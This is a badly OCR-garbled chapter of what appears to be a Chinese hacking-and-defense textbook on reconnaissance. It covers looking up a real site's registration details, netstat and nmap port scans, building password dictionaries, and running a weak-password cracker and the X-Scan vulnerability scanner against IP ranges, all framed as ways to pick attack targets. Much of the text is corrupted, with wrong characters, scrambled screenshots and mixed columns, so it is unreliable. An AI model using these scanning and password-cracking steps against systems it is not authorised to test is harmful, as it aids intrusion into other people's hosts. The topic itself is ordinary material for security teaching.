在 Internet 中 , 任何 一 个 网 站 在 正式 发 布 之 前 都 需要 问 有 关机 构 申 请 域名 。 申请 到 的 域 
名 信息 将 会 保存 在 域名 管理 机 构 的 数据 库 服务 费 中， 并 日 域 名 信息 常常 是 公开 的 ， 任 何人 
都 可 以 对 其 进行 查询 ， 这 些 信息 统称 为 网 站 的 备案 信息 。 这 些 信 息 对 于 黑客 来 说 就 是 有 用 
的 信息 ， 利 用 这 些 信 息 可 以 了 解 该 网 站 的 相关 信息 ， 以 确定 入 侵 攻 击 的 方式 和 入 侵 点 。 
STEP01: 打开 新 浪 首 页 STEP02: 选择 “经 营 性 网 站 备案 信息 ” 
































新 浪 兽 页 - 360 实 全 浏览 器 7.1 


名 | 可 可 四 
兴 而 网 谷 


新 浪 商 从 





启动 IE 浏览 器 ， 在 地 址 栏 中 输入 “http:Wwww. ”在 页 面 底部 单 击 “ 经 营 性 网 站 备案 信息 ”链接 。 
sina.com.cn/” 后 按 <Enter> 键 ， 打开 新 浪 首 页 。 
STEP03: 查看 网 0 





疡 演 殉 跳 转 至 新 的 页 面 ， 此 时 可 看 见 新 瀛 网 站 的 基本 情 
一 一 一 一 一 一 | 。 况 和 网 站 所 有 者 信息 。 
webmastercn@staff. sina. Com. cn 


| 北京 市 海江 区 北 四 环 西 路 58 己 理想 国际 大 厦 
网 站 所 有 者 情况 


三 这 102000102300001 
110108000924323 








Ea 
限 贡 尾 会 
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仿 网 站 所 有 者 信息 


wd 在 新 浪 网 所 有 者 信息 中 ， 除 注册 标号 、 注 册 号 、 名 称 和 住所 外 ， 还 包括 注 
提示 。 册 资 本 、 企 业 类 型 、 经 营 范围 和 法 定 代表 人 姓名 。 





2 不 3 确定 可 能 开放 的 靖 口 和 服务 


在 默认 情况 下 ， 有 很 多 个 安全 或 没有 作用 的 器 口 是 开局 的 ， 如 Telnet 服务 的 23 端口 、 
FTP 服务 的 21 端口 、SMTP 服务 的 25 端口 等 。 攻 击 者 使 用 扫描 工具 对 目标 主机 进行 扫描 ， 
可 以 获得 目标 计算 机 打开 的 端口 情况 ， 还 可 了 解 目标 计算 机 提供 了 哪些 服务 。 

1. 查看 本 机 开启 的 端口 

在 “命令 提示 从 ”窗口 中 输入 “netstat-a-n” 命 令 ， 即 可 查看 本 机 开启 的 靖 口 ， 在 运行 

结果 中 可 以 看 到 以 数字 形式 显示 的 TCP 和 UDP 连接 的 端口 号 及 其 状态 ， 如 下 图 所 示 。 


本 管理 员 ; CNWindows\system32\cmd,exe 











192.168.168.1:19809 
地址 192.168 .169.1:5319?7 


:135 


一 


@@ 竺 
= > 
加 
所 名 
SS 


LISTENING 
LISTENING 


hy 
SS 


LISTENING 
LISITENING 
LISTENING 
LISTENING 
LISTENING 
LISITENING 
LISTENING 
LISTENING ::]:61274 

LISTENING ::11:1900 

LISTENING 2 3 53195 > 

LISTENING 和 5h:9651 :di8e 9X11]:546 :x 
LISTENING e 5h:9651 :dil8e ?x11]:19@06 *:x 
LISTENING 088: :c5b:9651:d180:c77x11 ]:53102 闪 > 并 
27.-0.0.1:49454 ESTABLISHED e80::4c8e:68hbe:23d8:4976x%14]:546  ¥:¥ 
127.09.09.1:49455 ESTABLISHED e800::4c8e:68be:23d8:4976%14]:19@@ x:x 
192 .168.1.10:139 LISTENING e800: :4c8e:68be:23d8:49767%14]:53183 x:x 
192.168.1.16:51838 509.16.35.225.:443 CLOSE_WAIT Fe8@: :6103:6fh2:a9gei1:87?2ax16]:19@60 #:# 


加 加 加 回避 


SOmOmm 


SODOSOOHDHOHOODDOmS 


以 ei ~ ~ 
No 


Omm 
性 图 本 略图 回回 轿 轿 瑟瑟 加 辣 晤 


HODDOODOOOOODO® 
中 上 
>: 


[A 


© 
加 
四 
加 
® 


192.168.1.10:52342 202 .1098 .23 .1065 :5287 ESTABLISHED rfe89: :6193:6fb2:agel:872ax16]:53194 并 > 并 

192.168.1.10:53310 61.135.169.125:80 GLOSE_WAIT 

122.168.1.108:53311 61.135 .169 .125:80 CLOSE_WAIT :\sers dninistrator> 
中 < 











查看 本 机 开局 的 端口 


2. 查看 指定 IP 开启 的 端口 

Zenmap 是 一 束 非 党 流行 的 端口 扫 摘 软件 ， 下 和 面 以 For Windows 版 本 为 例 讲述 Zenmap 
是 如 何 扫描 奖 口 的 。 

从 网 上 下 载 “nmap-6.40-setup.exe”， 双击 “nmap-6.40-setup.exe” 应 用 程序 图 标 进 行 
安装 。 安装 完成 后 ,双击 果 面 上 的 “Nmap - Zenmap GUI” 图标， 即 可 进入 Zenmap 主 窗 口 。 











Scan Tools BProfile Help 
Target: Profile: |， Intense scan 


Command: nmap -T4 -A-v 


Services Nmap Output |Ports/ Hosts| Topology | Host Details | Scans | 


OS 4 Host 全 





Zenmap 主 窗口 


Eo 


> 





攻防 从 入 门 到 精通 


@ Zenmap 提供 了 更 加 简单 的 操作 方式 。 它 是 用 Python 语言 编写 而 成 的 开 
源 的 图 形 界 面 , 能 够 运行 在 不 同 操作 系统 平台 上 (WindowsLinux/ UNIX/Mac 
提示 Os 等 ). 


Zenmap 是 基于 命令 格式 的 扫描 软件 ， 可 使 用 nmap 命令 进行 端口 扫描 。Zenmap 对 端 
口 的 扫描 有 三 种 方式 。 

1) TCP connectO 闹 口 扫描 。 即 全 连接 扫描 ， 使 用 “-sST” 人 参数 ， 在 Zenmap 主 窗 口 的 
“Command” 文 本 框 中 中 输入 “nmap -sT 192.168.1.100” 命 令 ， 即 可 看 到 TCP 全 连接 扫描 
的 端口 ， 如 下 左 图 所 示 。 

2) TCP 同步 问 口 扫 摘 。 该 方式 为 半 连 接 扫描 ， 也 叫 隐 蔽 扫描 。 采 用 了 “-sS ”参数 ， 
在 “Command” 文 本 框 中 输入 “nmap -sS 192.168.1.100” 命 令 ， 即 可 看 到 TCP 半 连 接 扫描 
的 端口 ， 如 下 右 图 所 示 。 

















<“ Zenmap 





Scan Tools Profie Help Scan Tools Profile Help 
Target | 192.168.1.100 [=] profile: 可 二 |192.168.1.100 [] Profiile: | 图 [Cancel 


Command: nmap -sT h92.168.1.100 Command: | nmap -SS 上 92.168.1.100 


Services polog i EE Ports / Hosts | Topology | Host Details | Scans 


OS 4 Host nmap -sT 192.168.1.100 OS 4 Host Inmap -sS 192.168.1.100 





























同 localhost (192.16; 如 localhost (192.16; 
Starting Nmap 6.48 ( http://nmap.org ) at 2013-10-24 14:21 starting Nmap 6.48 ( http://nmap.org ) at 2913-19-24 14:37 

同 ”localhost (192.16; | 中 国标 准时 间 原 localhost (192.16; || 中 国标 准时 间 
Nmap scan report for localhost (192.165.1.160) Nmap scan report for localhost (192.168.1.166) 
Host is up (8.88895s latency). Host is up (8.88892s latency). 
Not shown: 997 filtered ports | Not shown: 997 filtered ports 
PORT STATE SERVICE PORT STATE SERVICE 
135/tcp open msrpc 135/tcp open msrpc 

39/tcp open ne acer Se 139/tcp open netbios-ssn 
445 Atcp oe mic ft- 445/tcp open microsoft-ds 
MAC Address: et (Giga-byte Technology Co.) MAC Address:_99:2B:34:09:76:49 (Giga-byte Technology Co.) 


Nmap done: 1_IP address (1 host up) scanned in 42.79 seconds Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds 








TCP connect() 端 口 扫描 结果 TCP 同 步 疡 口 扫 描 结果 

3 ) UDP 端口 扫描 。 该 方式 主要 采用 “-sSU” 参数 ， 在 “Command” 文 本 框 中 输入 “nmap 
-SU 192.168.1.100” 命 令 ， 即 可 看 到 扫描 的 UDP 端口 ， 如 下 左 网 所 示 。 

Zenmap 还 文 持 丰 寅 、 灵 活 的 命令 参数 ， 比 如 要 扫 摘 一 个 IP 地 址 段 的 UDP 端口 ， 还 可 
以 在 “Command” ET “nmap -SU 192.168.0.1-255” 命 令 ， 如 下 右 图 所 示 。 


Z [GE]- 二 Zenmap 
enmap sse Scan Tools Profle Help 
Scan Tools Profile Help Target |192.168.1.1-255 =| Profile: [e] [seen]| [cance 


Command: nmap -sU 192.168.1.1-25 引 
Target: | 192.168.1.100 -| profile: 


























Topol 
Command: |nmap -sU| 192.168.1.100 4 He nmap -sU 192.168.1.1- [=] § [petais 


ocalhost 16; 
Starting p 6. http://neap.ore ) at 2913-19-24 14:52 
Services -1 ocalhost 16; | Wap scan report for localhost (192.168.1.1 i 
2 st is up (0.60265 latency). 
ocalhost (192. All 1888 scanned ports on localhost (192,168.1.1 n|filtered 
MAC Address: :21:8A:99:AE:BG6 (Tp-link Technologies CO.) 
A DDE nmap -sU 192.168.1.100 -| slhost 92 
15 


Nmap scan report for localhost 
矶 ”localhost (192.16; ocalhot (0190246 | Wot he 999 open| si 
starting Nmap 6.48 ( http;//nmap.ore ) at 2013-19-24 13:56 








原 ”localhost (192,16; | 中 国标 准时 间 
Nmap scan report for localhost (192.168.1.160) 
Host is up (8.88876s latency). 
Not shown: 999 open|filtered ports 
PORT STATE SERVICE 
137/udp open netbios-ns 
MAC Address: 90:;2B:34:09:78:49 (Giga-byte Technology Co.) 


Nmap done: 1_IP address (1 host up) scanned in 17.91 seconds 

















UDP 痛 口 扫描 结果 IP 地 址 段 扫描 结果 


2.2 扫描 的 实施 与 防范 


黑客 在 确定 攻击 目标 时 ， 通 第 会 使 用 一 些 专 门 的 扫描 工具 对 目标 计算 机 或 和 个 IP 范 


EM 

















-第 2 章 
言 息 的 扫描 与 嗅 探 


内 的 计算 机 进行 扫描 , 从 扫描 结束 中 分 析 这 些 计算 机 的 漏洞 , 从 而 确定 攻击 目标 和 攻击 手段 。 


2.2:1 扫 朱 服务 与 剖 口 


黑客 通过 端口 扫描 器 可 在 系统 中 寻找 开放 的 端口 和 正在 运行 的 服务 ， 从 而 知道 目标 主 
机 的 操作 系统 的 详细 信息 。 目 前 网 络 中 大 量 主机 /服务 器 的 口令 为 空 或 口令 过 于 简单 ， 黑 客 
只 需 利 用 专用 扫描 堪 ， 即 可 轻松 控制 存在 这 种 弱 口 令 的 主机 。 

1. 小 榕 黑客 字典 

所 谓 黑 客 字 典 就 是 装 有 各 种 密码 的 破解 工具 , 通常 情况 下 ， 只 要 知道 本 地 文件 的 内 容 ， 
就 可 以 运用 黑客 字典 将 其 破解 。 当 然 ， 黑 客 字 和 典 文件 ， 直 接 关 系 到 黑客 是 否 能 破解 到 对 方 
的 密码 ， 以 及 破解 出 密码 花费 多 少时 间 。 

小 桥 黑客 字典 是 一 于 功能 强大 ， 可 根据 用 户 需 要 任意 设 定 包 含 字 符 、 字 符 串 的 长 度 等 
内 容 的 黑客 字典 生成 器 。 其 具体 操作 方法 曝光 如 下 。 
STEP01: 运行 “UltraDict.exe” STEP02: 切换 至 “选项 ”标签 卡 












































设置 ” 选项 “| 文件 存放 位 置 | 高 级 选项 | 
克 字母 区 数字 
所 -个 字母 区- 村 个 数字 


ly 字母 及 用 大 与 形式 
[人 避 你 首 子 母 大 瑟 
「 数字 在 字母 前 

[人 人 避 使 用 间隔 
厂 仅 避 使 用 辅音 字母 


这 母 范 从 上 =| 至 有 | 
从 所 -| 至 ”| 














弹出 “字典 设置 ”对 话 框 ， 在 “设置 ”标签 中 可 选 
择 生 成 字符 串 包含 的 字母 或 数字 及 其 范围 。 
STEP03: 切换 至 “高 级 选项 ”标签 卡 





abcdefghijklImnopqrstuywxyz 
abcdefghijklImnopqrstuywxyz 


设置 | 选项 “| 文件 存放 位 置 高 级 选项 | 


abcdefghijklImnopqrstuywxyz 





0123456789 


2 M3 时 守 ， 国 是 





"#0%8'0*+,-.} 
0123456789 














abcdefghijkimnopqrstuywxyz 








0123456789 


E*\ 黑 客 贷 料 \ 小 阅 黑 客 字 典 2 破 甫 版 HACK.DIC 








1830281K 
959300K 





将 字母 、 数 字 或 符号 位 置 进行 固定 。 指定 字典 文件 保存 位 置 之 单 击 “ 开 始 ” 
后 , 单 击 “ 确 定 ”按钮 ， 会 显 。 按钮 。 
示 所 设置 的 字典 文件 属性 。 


00 


取 


号 ee | 
新 全- 攻防 从 入 门 到 精通 


全 人 人 他 
STEP05: 生成 字典 





生成 字 虚 (1830281K Bytes) (未 响应 ) 


正在 生成 字典 , 这 个 过 程 可 能 会 持续 相当 一 段 时 间 . 


Es 





系统 开始 生成 字典 ， 可 查看 生成 字典 的 进度 。 

2. 弱 口 令 扫 描 器 Tomcat 

当 学 典 文 件 创建 好 后 ， 就 可 以 使 用 弱 口 令 扫 接 器 ， 加 载 自 己 编辑 的 字典 文件 进行 弱 口 
令 扫 描 了 。Tomcat 可 以 根据 需要 加 载 用 户 名 称 字 典 、 密 人 码 字 典 ， 对 一 定 IP 范围 内 的 主机 进 
行 弱 口 令 扫 摘 。 有 具体 的 操作 方法 曝光 如 下 。 


STEP01: 运行 “Apache Tomcat.exe” STEP02: 导入 黑客 字典 


焦 Apache Toacat Crack Http:y7gswg.0zd4F.CnyBLog by:0pen 





起 始 IP: | 190.168. 0 ,5 ” 终 lLIP: | 190.168. 0 .254 ”三 添 天 | [开通 











| 三 导入 5S 已 描 ip: 








| || [El 
端口 : 间隔 : 毫秒 延 时 : 毫秒 间隔 与 延 时 视 网 速 快慢 而 设 定 端口 默认 为 :8080 




















共 :250 台 





打开 操作 界面 ， 单 击 “ 设 置 ”标签 。 单 击 “ 用 户 名 ”和 “密码 ”列表 框 下 方 的 “导入 ” 
按钮 ， 可 导入 编辑 好 的 黑客 字典 。 

STEP03: 开始 扫描 

EECETRTETRETTEEEEEEEE 

起 焰 IF: | 190.168. 0 . 5 ”终止 IP: | 190.168. 0 .254 ” 厂 潍 贡 [天 始 单 击 “信息 ”标签 ， 输 入 需要 扫描 的 I|P 地 址 范围 。 
单 击 “添加 ”按钮 ， 即 可 将 其 添加 到 地 址 列表 中 。 
单 击 “开始 ”按钮 ， 即 可 开始 扫描 。 若 发 现 活动 主 
机 ， 即 可 对 主机 的 用 户 名 和 密码 进行 破解 。 









































LE: 





言 息 的 扫描 与 限 探 


2.2.2 Free Port Scanner 与 $canPotrt 等 常见 扫描 工具 


入 侵 者 弟弟 利用 一 些 专 门 的 扫描 工具 对 目标 主机 的 端口 进行 扫 朱 ， 目 前 可 以 用 来 扫描 
闹 口 的 扫描 工具 有 很 多 ， 下 务 束 介绍 两 种 常见 的 扫 摘 工具 。 

1. Free Port Scanner 

Free Port Scanner 是 一 蒜 问 口 扫描 工具 ， 用 户 可 以 快速 扫 摘 全 部 端口 ， 也 可 以 指定 扫 插 
范围 。 使 用 Free Port Scanner 进行 问 口 扫描 的 过 程 曝光 如 下 。 


STEP01: 运行 “Free Port Scanner” STEP02: 开始 扫描 























ww Free Port Scanner 





| Files 


[Ree Rom Seam wwnsaudtor eom | 全 \、 月 TB [Ro COE nnsaudior eom 


Fast Network Port Scanner LEARN MORE Fast Network Port Scanner 人 LEARN MORE 


一 











Product Key Rxplorer -~ Find over +46B00 _ software product keys from local or Download How! | = 到 m Download Now! | 


Hsauditor Network Security Auditor — Scan and momitor network for Tl | | Hsauditor Network Security Auditor ~ Scan and monitor network for Download Now! | 


-Scan Parameters ~ 


ocan [arameters = 
eT shon Closed Ports Tr 192 .168 .1 100 FZ Show Closed Port: 











TCF 21-23, 25, 53, 80, 119, 135, 137-139, 443, 445, 1080, 1433, 3128, 3306, 8080 3 | 





LT address |Portn.| |Port Ss... |Port Mane __ |Description 


X 192. 168. 1. 100 Closed file 
X 192. 168. 1. 100 Closed secure 
X 192. 168. 1. 100 Closed telnet telnet 
X 192. 168. 1. 100 Closad smtp simple mail transfoer 
Closed domain 1 
Closed http 
Closed pop3 
Upen epmap 
| X 192 168 1 100 Closaed nethios-ns 
X 192. 168. 1. 100 Closed netbios-daem i ee Service 
Dpen netbios-ssn netbios session service 
[losad https 
Dpen microsoft-ds microsoft-ds 
Closed socks socks 
X 192. 168. 1. 100 Closed ms-sql-s microsoft-sql-server 
X 192. 168. 1. 100 Closed nd-aas hctive 
X 192. 168. 1. 100 Closed mysql mysql 
X 192. 168. 1. 100 Closed http-alt common http proxy/second web server port. 
4 
| 


| i 回国 图 目 

















在 “IP” 文 本 框 中 输入 目标 主机 的 IP 地 址 ， 再 勾 选 ” 单 击 “Scan” 按 钮 ， 即 可 扫描 到 目标 主机 的 全 部 
“Show Closed Ports” 复 选 框 。 疾 口 ， 其 中 绿色 标记 用 于 标识 开放 的 端口 。 


STEP03: 只 对 目标 主机 开局 的 端口 进行 扫描 


束 ，Free Port Scanner 





>» [Bee (Pom SOE neaudioreom 


Fast Network Port Scanner LEARN MORE 


Product Key Explorer — Find over +4800 software product keys from local or Download Now! 


Nsauditor Network Security Auditor -~ Scan and monitor network for Download How! 
ly 让 .168 . 1 .100 Tm Show Closed Port: | 在 “IP” 文本 框 中 输入 要 扫描 的 LR 地 址 之 后 , 取 


21-23, 25, 53, 80, 110, 135, 137-139, 443, 445, 1080, 1433, 3128, 3308, 8080 和 
| 消 义 选 ” " 复 选 框 , 单 击 
Td (ET 消 色 选 “Show Closed Ports , Scan 


wy 192. 166.1.100 139 netbios-ssn netbios session service 


wp 192.168.1.100 445 microsoft-ds microsoft-ds 按 钮 ， 在 扫 描 完 全 上 毕 之 后 ， BN] oT 从 扫 描 结 二 果 中 看 到 | 日 
标 主机 开局 的 端口 。 























4 ?| | 
国 国 回国 回国 国 国 图 国 加 图 国 国 回 国 国 国 国 国名 国 国 网 国 国 加 加 图 图 四 国 辆 图 国 国 固 轩 国 国 图 国 国 加 图 国 四 
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今 公 公公 
2. ScanPort 





宏 


> 


攻防 从 入 门 到 精通 





ScanPort 软件 不 但 可 以 用 于 网 络 扫描 ， 而 且 可 以 探测 指定 卫 地 址 及 病 口 ， 速 度 比 传统 
软件 快 ， 且 支持 用 户 目 设 IP 病 口 义 增 加 了 其 灵活 性 。 其 具体 的 使 用 方法 如 下 。 


STEPO1: 


i eT 168 . 
兰 束 IF:| 192 .1B8. 1 .255 
端口 号 :|80, 139, 440-445 


打开 ScanPort 主 窗 口 ， 设 
置 起 始 IP 地 址 、 结 束 IP 地 址 以 


及 要 扫 摘 的 疹 口 号 = 


运行 ScanPort 





2.2.3 ”扫描 器 X-Manh 查 本 机 隐患 








X-Scan 是 由 安全 焦点 开发 的 一 个 功能 强大 的 扫描 工具 。 
地 址 段 〈 或 单机 ) 进行 安全 漏洞 检测 ， 








1. 用 X-Scan 查看 本 机 IP 地 址 
利用 X-Scan 扫 摘 器 来 查看 本 机 的 IP 地 址 的 方法 很 徇 单 , 需要 先 指 定 扫描 的 卫 地 址 范 


。 由 于 是 本 机 探测 





|， 只 需要 在 “命令 提示 符 ” 窗 


即 可 奉 知 本 机 当前 的 王 地 址 。 


.添加 IP 地 址 
人 IP 地 址 后 ， 则 需要 将 卫 地 址 添加 到 X-Scan 扫描 缉 中 ， 具 体操 作 步 





呆 管理 员 : CNWindows\system32\cmd.exe 


Mic Windows CR 本 6.1.7601] 
版 权 子 宪 " Ce . 2069 Microsoft Corporati 


ministrator>ipconf ig 


太 网 适配器 本 地 








STEP02: 查看 扫描 结果 


办 SscanPort 


信息 设置 
起 始 IF:| 192 .168 . 


结束 IF: 和 
应 口号 :|80, 139, 440-445 
超 时 :| ”200 豪 种 
线程 数 :| 10 | 


扫描 结果 


192. 1686. 1. 10: 
192. 188. 1. 10: 
192. 188. 1. 10: 
lez T1686. 1. 53 





单 击 “ 扫 描 ” 开始 进行 扫描 ， 从 扫描 结果 中 可 以 看 出 IP 地 址 自 
按钮 。 中 计算 机 开启 的 端口 。 


它 及 用 多 线程 方式 对 指定 IP 





: fe80: 


和 


文 持 插件 功能 。 


口 命令 提示 符 下 输入 “ipconfig” 命 令 ， 


保留 所 有 权利 。 


co5hbh:9651 :di8e:c?7?x%11 
55 .255.255.0 
168-1.1 


: fe80::4c8e:68hbhe:23d8 :4976X14 


: 192.168 





ss 


查看 本 机 IP 地 址 


骤 如 下 。 


44 


2 
言 息 的 扫描 与 限 探 


STEP01: 打开 X-Scan 主 窗口 STEP02: 单 击 “检测 范围 ”选项 


二 X-Scan v3,3 GUI 
立 件 (W ”设置 (W)】 音 寿 (X) 工具 (VY) Language 帮助 (加 








三 从 文件 获取 主机 列表 


， 系 统 要 求 : Windows NT/2000/XP/2003 
理论 上 可 运行 于 Windows 了 王 系 列 操作 系统 ， 扒 怪 运 行 于 Yindows 2000 








po i 设置 ”> "扫描 参 ” ”图 输入 需要 扫描 的 若 不 知道 输入 的 格式 ， 


能 简介 、 常 见 问题 解 ” 数 ”菜单 命令 或 单 击 工具 栏 ”IP 地 址 段 。 hd “示例 ”按钮 。 
答 等 信息 。 上 的 “扫描 参数 ”按钮 @ 。 
STEP03: ”查看 示例 格式 STEP04: 返回 “扫描 参数 ”对 话 框 


指定 IF 范围 : 


[ez. 168.1. 1-192. 168. 1. 88 
th | 


厂 从 文件 获取 主机 列表 


localhost 
www.target.com 
192.168.0.1 
192.168.0.1/24 
192.168.1.1-192.168.2.100 
192.168.0.1,192.168.1.1-10,192.168.2.1/24 
无 效 想 式 : 
192.168.0-1.1 
192.168.0.1-1.254 
192.168.0/24.1 
192.168.0.* 








了 解 有 效 输入 格式 后 单 击 “ 确 定 ” 按 钮 。 还 可 通过 勾 选 从 文件 获取 主机 列表 复 选 框 , 从 存 
储 IP 地 址 的 文本 文件 中 读 取 待 检测 的 主机 地 址 。 


存储 IP 地 址 的 文本 文件 中 ， 每 一 行 可 包含 独立 的 IP 地 址 或 域名 ， 也 可 以 


包含 以 “-” 和 “,” 分 隔 的 IP 地 址 范围 。 





在 IP 地 址 输入 完毕 后 ， 可 以 发 现 扫 描 结束 后 目 动 生成 的 “报告 文件 ”项 中 的 文件 名 也 
在 发 生 相 应 的 变化 。 通 常 , 这 个 文件 名 不 必 手 工 修改 , 只 需 记 住 这 个 文件 将 会 保存 在 X-Scan 
目录 的 LOG 子 目 录 下 。 设 置 完毕 后 单 击 “确定 ”按钮 ， 即 可 关闭 对 话 框 。 

3. 开始 扫 拍 

在 设置 好 扫描 参数 之 后 ， 允 可 以 开始 扫 摘 了 。 单 击 X-Scan 工具 栏 上 的 “开始 扫描 ?” 
按钮 区， 即 可 按 设 置 条 件 进行 扫描 ， 同 时 显示 扫 摘 进程 和 扫描 所 得 到 的 信息 ， 如 下 左 图 所 
示 〔〈 可 通过 单 击 右 下 方 窗 格 中 的 “普通 信息 ”“ 漏 洞 信息 ”及 “错误 信息 ”选项 卡 ， 查 看 
所 得 到 的 相关 信息 )。 在 扫描 完成 后 将 自动 生成 扫描 报告 并 显示 出 来 ， 其 中 显示 了 活动 主 


和 


















































了 芭 ;=a 

下 攻防 从 入 门 到 精通 

新 全 人 人 他 

机 .IP 地址 、 存 在 的 系统 漏洞 和 其 他 安全 隐患 ， 同 时 还 提出 了 安全 隐患 的 解决 方案 ， 如 下 
右 图 所 示 。 

心 xsanv33GUL Ee 


交 析 MV)= 设 加 Ww) 惠 易 00 上 VW) “language 帮助 加 
| 人 @I mm| 本 | 国 才 | 回 


国 ' 让 192. 168.1.10 人 indows 本 











支 全 医 洞 及 般 决 方案 : 192.168.1.10 








扫描 进程 和 扫描 所 得 到 的 信息 扫描 报告 


X-Scan 扫描 工具 不 仅 可 扫描 目标 计算 机 的 开放 端口 及 存在 的 安全 隐患 ， 而 且 具 有 目 
标 计算 机 物理 地 址 查询 、 检 测 本 地 计算 机 网 络 信 息 和 Ping 目标 计算 机 等 功能 ， 如 下 左 图 
所 示 。 

当 所 有 选项 都 设置 完毕 之 后 ， 如 果 想 将 来 还 使 用 相同 的 设置 进行 扫 摘 ， 则 可 以 对 
这 次 的 设置 进行 保存 。 在 “扫描 参数 ”对 话 框 中 单 击 “ 另 在” 按钮 ， 如 下 右 图 所 示 可 
将 目 己 的 设置 保存 到 系统 中 。 当 要 再 次 使 用 时 上 只 需 单 击 “ 载 入 ”按钮 ， 选 择 已 保存 的 
文件 即 可 。 




















人 指定 IP 范围 
IF 地 址 /主机 名 : 


ww sina. com. en V 查 启 3 | 1 : 地 址 和 | 


主 i WH. Sina. com 2 厂 从 文件 获取 主机 列表 
拓 202. 108. 33. 60 
: 北京 市 


史 





多 项 功能 另存 文件 


4. 高 级 设置 

X-Scan 在 默认 状态 下 效果 却 往 往 不 会 发 挥 到 最 佳 状 态 , 这 个 时 候 束 需要 进行 一 些 高 级 
设置 来 让 X-Scan 变 得 强大 起 来 。 局 级 设置 需要 根据 实际 情况 来 进行 相应 的 设置 ， 否 则 
X-Scan 也 许 会 因为 一 些 “ 高 级 设置 ”而 变 得 脆弱 不 堪 。 

1) 设置 扫描 模块 。 展 开 “ 全 局 设置 ”选项 之 后 ， 选 取 其 中 的 “扫描 模块 ”选项 ， 则 可 
选择 扫描 过 程 中 需要 扫 摘 的 模块 ， 在 选择 扫描 模块 时 还 可 在 其 右 侧 窗 格 中 得 看 该 模块 的 相 
关 说 明 ， 如 下 左 图 所 示 。 

2) 设置 扫 摘 线程 。 因 为 X-Scan 是 一 知 多 线程 扫描 工具 ， 所 以 在 “全 局 设置 ”选项 下 
的 “并 发 扫 摘 ” 子 选 项 中 ， 可 以 设置 扫描 时 的 线程 数量 ， 如 下 右 图 所 示 “〈 扫 摘 线 程 数 量 要 
根据 网 络 情况 来 设置 ， 不 可 过 大 )。 


EEC 














2 





信息 /EC 的 扫 拍 与 限 探 


最 大 并 发 主机 数量 : 
10 
最 大 并 发 线程 数量 : 


各 插件 最 大 杀 发 线程 数量 : 


[ 叫 也 
4 
v 
v 
"| 
v 
本 
v 
4 
“ 








选择 扫描 模块 设置 扫描 线程 数量 

3) 设置 扫描 报告 存放 路 径 。 在 “全 局 设置 ”选项 中 选取 “扫描 报 告 ” 子 选项 ， 即 可 设 
置 扫 描 报告 存 放 的 路 径 ， 并 选择 报告 文件 保存 的 文件 格式 。 若 需 要 保存 自己 设置 的 扫描 IP 
地 址 范围 ， 则 可 在 义 选 “保存 主机 列表 ” 复 选 框 之 后 ， 输 入 保存 文件 名 称 ， 这 样 ， 以 后 残 
可 以 调用 这 些 IP 地 址 范围 了 。 寿 用户 需要 在 扫描 结束 时 目 动 生成 报告 文件 并 显示 报告 ， 则 
可 勾 选 “扫描 完成 后 目 动 生成 并 显示 报告 ” 复 选 框 ， 如 下 左 图 所 示 。 

4) 设 症 其 他 扫描 选项 。 在 “全 局 设置 ”选项 中 选取 “其 他 设置 ” 子 选 项 ， 则 可 设置 扫 
拓 过 程 其 他 选项 ， 如 勾 选 “ 跳 过 没有 检测 到 开放 呈 口 的 主机 ” 复 选 枉 ， 如 下 碳 Se 


[oo me 























报告 文件 : 和 人 人 跳 过 没有 响应 的 主机 

[192_168_1_10_xeport. html | = 芝 殷 生 个 无 条 件 扫 指 

报告 文件 类 型 : 上 ly 

Pr =] [ 跳 过 没有 检测 量 开 放 端 口 的 主机 
[vy 使 用 WHAP 判 断 远 程 操作 系统 


jy 保存 主机 列表 厂 显示 详细 进度 


列表 文件 : 
[192_168_1_10_host1i st. txt 


jy 扫 摘 完成 后 自动 生成 并 显示 报告 








扫描 报告 设置 其 他 选项 设置 
5) 设置 扫 朱 端口。 展开“ 插件 设置 ”选项 并 选取 “端口 相关 设置 ” 子 选 项 ， 即 可 扫 摘 
疹 口 范围 以 及 检测 方式 ， 如 下 左 图 所 示 。 者 要 扫 摘 某 主机 的 所 有 端口 ， 则 可 在 “ 待 检测 问 





口 ” 文 本 框 中 输入 “1 一 6$$3S”。 
6) 设置 SNMP 扫描 。 在 “插件 设置 ”选项 中 选取 “SNMP 相关 设置 ” 子 选 项 ， 用 户 
可 以 选取 在 扫描 时 获取 SNMP 信息 es 如 下 石 图 所 不 。 


1" SiPB T, 9 13, 19, 21, 22, 23, 25, 53, 79, 80, 110, 111, 119, 135, 139, 143, 443, 445, 465, 51 
ETETDS 相 关 吉 检测 方式 : 

再 人 Fer <] 

i 友 根据 | 向 应 识别 服务 

预 设 知 名 服务 端口 : 











选择 需要 获取 的 SNMP 信 息 


-~ 





一 > 
-= 时 攻防 从 入 门 到 精通 
会 性 性 


7) 设置 NETBIOS 扫描 。 和 选取“ 插件 设置 ”选项 下 的 “NETBIOS 相关 设置 ” 子 选 项 ， 
用 户 可 以 选择 需要 获取 的 NETBIOS 信息 ， 如 下 图 所 示 。 








检测 以 下 NETBT0s 信 息 : 


需要 获取 的 NETBIOS 信 息 











8) 设置 漏洞 检测 脚本 。 选 取 “ 插 件 设置 ”选项 下 的 “漏洞 检测 脚本 设置 ” 子 选 项 ， 在 
显示 窗口 中 取消 勾 选 “全 选 ” 复 选 枉 ， 单 击 “ 选 择 脚 本 ”按钮 ， 即 可 选择 扫描 时 需 要 加 载 
的 漏洞 检测 脚本 。 





园 Select Scripts 








存 为 列表 文件 : 
肚 本 列表 : custom. nsl 千本 宅 地 本 摘要 全 
| 图 _ 选择 脚本 | ibi is runmi Es to the 


厂 全 选 示 i 本 Dunps all the re_ 











脚本 运行 超时 (种 ) : 
180 


网 络 读 取 起 时 (种 ) : 
5 


|v 支 全 扫描 三 过 破坏 性 脚本 ) 


| | Backdoors 
| CGI abuses 了 mapper service checks the prese 
CGI abuses : XSS 


] CTSCD 
_ |] Default Unix Account’ 
| Deni al of Service 


DIETP = 

| | Gain a shell remotel’ 

网 Gain root remotely 

LI General 
| Mi sec. 


| | Hetware 








] NIS 
[| Peer-To-Pee a Sh: 
| Remote file 


] Service I 
SMTP problem 


回 alis service 

回 md service 

回 automountd service 
sd service 


回 Sun rpe. emsa overflow 


回 database servi 
回 anisd service 





checks the presel | 
checks the prese 
Checks the prese 
Checks the prese 
Checks if Sun rr 
checks the prese 
Checks the prese 
checks the prese 
checks the prese 
Checks the prese 
checks the prese 马 
Ahanlerm dha mon 


' 


| 选中 依赖 时 本 一 


Total 46 scripts. 


选择 漏洞 检测 脚本 


my | 




















